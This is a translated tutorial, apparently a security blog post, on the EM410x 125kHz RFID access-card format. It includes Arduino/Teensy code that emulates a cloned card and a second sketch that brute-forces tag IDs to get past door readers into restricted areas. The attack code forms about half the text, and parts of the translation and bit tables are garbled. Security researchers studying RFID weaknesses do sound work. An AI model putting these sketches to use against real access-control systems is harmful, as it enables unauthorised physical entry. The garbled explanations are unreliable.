Open, 2013/08/22 saveth
First of all, I have to mention again those low frequency cards (EM410X, etc.) that work in 125khz frequency, so that you can read the following.
What is low frequency? Here is the explanation of low frequency:
Low frequency (LF, Low frequency) refers to radio waves with frequency bands ranging from 30KHz to 300KHz. Some radio frequency identification (RFID) tags use low frequencies. These tags are often called LFID’s or LowFID’s (Low Frequency Identification).
However, LFID’s /LowFID’s commonly used (not the only) frequency is 125kHz/134kHz. 125kHz/134kHz is only the frequency that low frequency RFID is based on. This frequency does not have any function, that is, the frequency itself does not have the so-called ID identification, reading and writing, etc. And the commonly used low frequency card HID, T55xx, EM410x and other series, these series of low frequency cards are often used in life will encounter. This time we are talking about EM410x series based on 125kHz for access control ID identification.
Here is the format of EM410x:
11 11 11 1 9bits first 8 bits version or manufacturer ID D00 D01 D02 D03 P0 D10 D11 D12 D13 P1 D20 D21 D22 D23 P2 D30 D31 D32 D33 P3 D40 D41 D42 D43 P4 10bits line check D50 D51 D52 D53 P5 32bits data D60 D61 D62 D63 P6 D70 D71 D72 D73 P7 D80 D81 D82 D83 P8 D90 D91 D92 D93 P9 PC0 PC1 PC2 PC3 S0 4 Bit checkCopy the codeThe 64-bit data contains nine consecutive 1’s as the start of the data, d00-D93 as the user data, P0-P9 as the row parity check bits, pc0-pc3 as the column parity check bits, and S0 as the end of the data.
The simple and popular way to figure out what even check is, is whether the number of 1’s is odd or even.
For example, if the binary of 0x01 is 0001, the number of 1's in the data is odd. If the number of 1's is even, the number of 1's should be 00011. If the data is 1110, the parity is of course 11101.Copy the codeThe following practical examples illustrate the EM410x format:
If I had an EM410x card, the ID printed on the card would be:
0005206306
Copy the codeIf you read in Proxmark3 or low frequency reader, you will see an extra two digits in the ID, which may be the 8-bit version, manufacturer, or user ID. If we read in Proxmark3, ID is:
0x0600503472
Copy the codeThe corresponding 0×00503472=5206306, and 0×06 is the identifier, and its format will be what? Take a look at this analysis:
The first is the data header:
111111111
Copy the codeCard number data and line parity check bits
0 = 0000 0 6 = 0110 0 0 = 0000 0 0 = 0000 0 5 = 0101 0 0 = 0000 0 3 = 0011 0 4 = 0100 1 7 = 0111 1 2 = 0010 1 p = 0001 (Column parity check bit) 0 EndCopy the codeFrom the above data we will therefore get the following values:
111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010
Copy the codeThis is the format of EM410x, if there is anything not clear, please use Google and other search engines for information search, next is to talk about how to use Teensy EM410x simulation operation.
EM410x Tag was simulated by Teensy
List of hardware components:
1. Low frequency coil based on 125kHz 2. Capacitance 3. Resistance 10K 5. Teensy++ 2.0Copy the codeHow to make a 125khz resonant circuit. You need to know the LC resonance formula
F frequency L inductance C capacitance
If the coil inductance you buy is 345UH, then you need a 4700PF capacitor. If the coil inductance is 730UH, then you need a 2200PF capacitor. Once the antenna is configured, write the following code using Teensy++ 2.0, or you can use the Arduino development board.
Teensy++ 2.0 EM410x simulation code is as follows:
#! c# String sStart = "1111111110000000000"; // String sStop = "0"; int data_to_spoof[64]; int coil_pin = 9; int a,b,c,d; unsigned long id; char HexCode[8]; void setup() { // Serial.begin(9600); pinMode(coil_pin, OUTPUT); digitalWrite(coil_pin, LOW); id = 0x503472; a=0; b=0; c=0; d=0; sprintf(HexCode,"%04X%04X",id); String s = sStart + Em4xCode(HexCode[4]) + Em4xCode(HexCode[5]) + Em4xCode(HexCode[6]) + Em4xCode(HexCode[7]) + Em4xCode(HexCode[0]) + Em4xCode(HexCode[1]) + Em4xCode(HexCode[2]) + Em4xCode(HexCode[3]) + EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop; // Serial.println(s); toCode(s); } void set_pin_manchester(int clock_half, int signal) { int man_encoded = clock_half ^ signal; if(man_encoded == 1) { digitalWrite(coil_pin, HIGH); } else { digitalWrite(coil_pin, LOW); } } String Em4xCode(String code) { if (code == '1') {d+=1; return "00011"; } if (code == '2') {c+=1; return "00101"; } if (code == '3') {c+=1; d+=1; return "00110"; } if (code == '4') {b+=1; return "01001"; } if (code == '5') {b+=1; d+=1; return "01010"; } if (code == '6') {b+=1; c+=1; return "01100"; } if (code == '7') {b+=1; c+=1; d+=1; return "01111"; } if (code == '8') {a+=1; return "10001"; } if (code == '9') {a+=1; d+=1; return "10010"; } if (code == 'A') {a+=1; c+=1; return "10100"; } if (code == 'B') {a+=1; c+=1; d+=1; return "10111"; } if (code == 'C') {a+=1; b+=1; return "11000"; } if (code == 'D') {a+=1; b+=1; d+=1; return "11011"; } if (code == 'E') {a+=1; b+=1; c+=1; return "11101"; } if (code == 'F') {a+=1; b+=1; c+=1; d+=1; return "11110"; } return "00000"; } String EvenParity(int Parity) { if ((Parity % 2) == 1) return "1"; return "0"; } void toCode(String s) { for(int i = 0; i < 64; i++) { if (s[i]=='0'){data_to_spoof[i]=0; }else{data_to_spoof[i]=1; } } } void loop() { for(int i = 0; i < 64; i++) { set_pin_manchester(0, data_to_spoof[i]); delayMicroseconds(256); set_pin_manchester(1, data_to_spoof[i]); delayMicroseconds(256); }}Copy the codeThe point here is that, in case you don’t understand why it’s sent this way, it’s coded as Manchester code, so I’ll just say it in a general way.
For example, to send 64-bit data:
111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010
Copy the codeSo how long does it take to send one bit? The answer is 64,125 KHZ is 512us which means 512us transmits 1 bit, but Manchester code is represented by 2 bits, if the data is 1, Manchester code is 10, and if the data is 0, Manchester code is 01. Therefore, 512us/2=256us should be transmitted when the data is converted to Manchestercode. However, the program converts the 64-bit data to Manchestercode and sends it at delayMicroseconds(256).
When we use Teensy related simulation operation, found that, in fact, as long as we do relevant exhaustive testing, or we can breakthrough the limitation of entrance guard system more quickly into the restricted area, in the test environment, because the card reader and read without any delay, so we can be extremely fast TagID exhaustive, However, due to each access control has its own Settings and environmental factors, we are not sure whether the following exhaustive code is suitable for everyone, so we just put forward the feasibility of conjecture to write this article.
Here is the code for the brute force test:
#! c# String sStart = "1111111110000000000"; String sStop = "0"; int data_to_spoof[64]; int led = 6; int coil_pin = 9; int a,b,c,d; unsigned long id; char HexCode[8]; void setup() { // Serial.begin(9600); pinMode(led, OUTPUT); pinMode(coil_pin, OUTPUT); digitalWrite(coil_pin, LOW); id = 0x502E96; } void set_pin_manchester(int clock_half, int signal) { int man_encoded = clock_half ^ signal; if(man_encoded == 1) { digitalWrite(coil_pin, HIGH); } else { digitalWrite(coil_pin, LOW); } } String Em4xCode(String code) { if (code == '1') {d+=1; return "00011"; } if (code == '2') {c+=1; return "00101"; } if (code == '3') {c+=1; d+=1; return "00110"; } if (code == '4') {b+=1; return "01001"; } if (code == '5') {b+=1; d+=1; return "01010"; } if (code == '6') {b+=1; c+=1; return "01100"; } if (code == '7') {b+=1; c+=1; d+=1; return "01111"; } if (code == '8') {a+=1; return "10001"; } if (code == '9') {a+=1; d+=1; return "10010"; } if (code == 'A') {a+=1; c+=1; return "10100"; } if (code == 'B') {a+=1; c+=1; d+=1; return "10111"; } if (code == 'C') {a+=1; b+=1; return "11000"; } if (code == 'D') {a+=1; b+=1; d+=1; return "11011"; } if (code == 'E') {a+=1; b+=1; c+=1; return "11101"; } if (code == 'F') {a+=1; b+=1; c+=1; d+=1; return "11110"; } return "00000"; } String EvenParity(int Parity) { if ((Parity % 2) == 1) return "1"; return "0"; } void toCode(String s) { for(int i = 0; i < 64; i++) { if (s[i]=='0'){data_to_spoof[i]=0; }else{data_to_spoof[i]=1; } } } void loop() { a=0; b=0; c=0; d=0; sprintf(HexCode,"%04X%04X",id); String s = sStart + Em4xCode(HexCode[4]) + Em4xCode(HexCode[5]) + Em4xCode(HexCode[6]) + Em4xCode(HexCode[7]) + Em4xCode(HexCode[0]) + Em4xCode(HexCode[1]) + Em4xCode(HexCode[2]) + Em4xCode(HexCode[3]) + EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop; // Serial.println(s); toCode(s); for(int ii = 0; ii < 2; ii++) { for(int i = 0; i < 64; i++) { set_pin_manchester(0, data_to_spoof[i]); delayMicroseconds(265); set_pin_manchester(1, data_to_spoof[i]); delayMicroseconds(265); } } if (id == 0x50308A){digitalWrite(led, HIGH); } id += 1; if (id > 0xFFFFFFFF ){id=0; }}Copy the code